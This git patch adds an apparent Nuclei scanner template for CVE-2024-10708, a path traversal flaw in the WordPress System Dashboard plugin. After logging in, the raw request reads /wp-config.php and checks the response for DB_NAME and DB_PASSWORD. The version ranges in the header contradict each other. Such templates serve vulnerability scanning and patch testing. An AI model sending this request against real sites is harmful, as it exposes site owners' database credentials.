From b89c2b8a4fa68ca64218a5eb4367e4c058717101 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 8 Oct 2025 09:18:12 +0900 Subject: [PATCH] Add files via upload --- http/cves/2024/CVE-2024-10708.yaml | 47 ++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-10708.yaml diff --git a/http/cves/2024/CVE-2024-10708.yaml b/http/cves/2024/CVE-2024-10708.yaml new file mode 100644 index 00000000000..77509b3b1e4 --- /dev/null +++ b/http/cves/2024/CVE-2024-10708.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-10708 + +info: + name: System Dashboard < 2.8.15 - Admin+ Path Traversal + author: 0x_Akoko + severity: high + description: | + The System Dashboard plugin (<= 1.0.2) exposes a local file inclusion vulnerability. + This template logs in (Admin+) and then attempts to read system files via `sd_viewer`. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-10708 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/system-dashboard/system-dashboard-103-local-file-inclusion + - https://wpscan.com/vulnerability/61d750a5-8c2c-4c94-a1a9-6a254c2a0d03/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-10708 + cwe-id: CWE-22 + metadata: + verified: true + max-request: 3 + tags: cve,cve2024,wordpress,wp-plugin,lfi,auth,system-dashboard + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin-ajax.php?action=sd_viewer&filename=/wp-config.php&load_plugins[]=system-dashboard/system-dashboard.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 \ No newline at end of file